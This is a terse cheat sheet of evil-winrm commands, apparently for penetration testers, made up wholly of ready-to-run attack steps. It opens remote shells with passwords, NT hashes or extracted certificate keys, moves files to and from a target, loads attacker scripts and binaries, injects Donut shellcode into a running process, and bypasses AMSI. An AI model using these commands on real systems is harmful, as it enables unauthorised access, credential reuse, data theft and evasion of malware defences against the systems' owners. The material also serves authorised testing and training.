Evil-winrm

# Create WinRM session to target:
evil-winrm -i <IP address> -u '<username>' -p '<password>'

# Create WinRM session to target with NT hash:
evil-winrm -i <IP address> -u '<username>' -H '<NT hash>'

# Create WinRM session to target with SSL:
evil-winrm -i <IP address> -u '<username>' -p '<password>' -S

# Create WinRM session to target with PFX certificate.
# First, extract the public certificate:
openssl pkcs12 -in <pfx file> -clcerts -nokeys -out public-cert.pem
# Then, extract the private key:
openssl pkcs12 -in <pfx file> -nocerts -out priv-key.pem -nodes
# Finally, establish session with those files:
evil-winrm -i <IP address> -c public-cert.pem -k priv-key.pem -S

# Create WinRM session to target, specifying path
# for powershell scripts on attack box:
evil-winrm -i <IP address> -u '<username>' -p '<password>' -s <scripts path>

# Create WinRM session to target, specifying path
# for binaries on attack box:
evil-winrm -i <IP address> -u '<username>' -p '<password>' -e <binaries path>

# Inside evil-winrm session, upload file on target:
upload <file path>

# Inside evil-winrm session, download file from target:
download <file path>

# Show evil-winrm session menu, with loaded ps1 files:
menu

# Inside evil-winrm session, load powershell files
# from path specified with -s flag:
<.ps1 file>

# Inside evil-wirm session, invoke binary from path
# specified with -e flag:
Invoke-Binary <binary path> <params>

# Inside evil-winrm session, inject x64 payloads generated
# by donut:
Donut-Loader -process_id <PID> -donutfile <donut file>

# Donut payload can be generated with donut-maker,
# found here: https://github.com/Hackplayers/Salsa-tools/blob/master/Donut-Maker/donut-maker.py
# It requires to install donut shellcode with python3 -m pip install --user donut-shellcode.
donut-maker.py -i payload.exe

# Alternatively, find process ID automatically:
Donut-Loader -process_id (get-process <process name e.g. notepad>).id -donutfile <donut file>

# Inside evil-winrm session, attempt to bypass AMSI:
Bypass-4MSI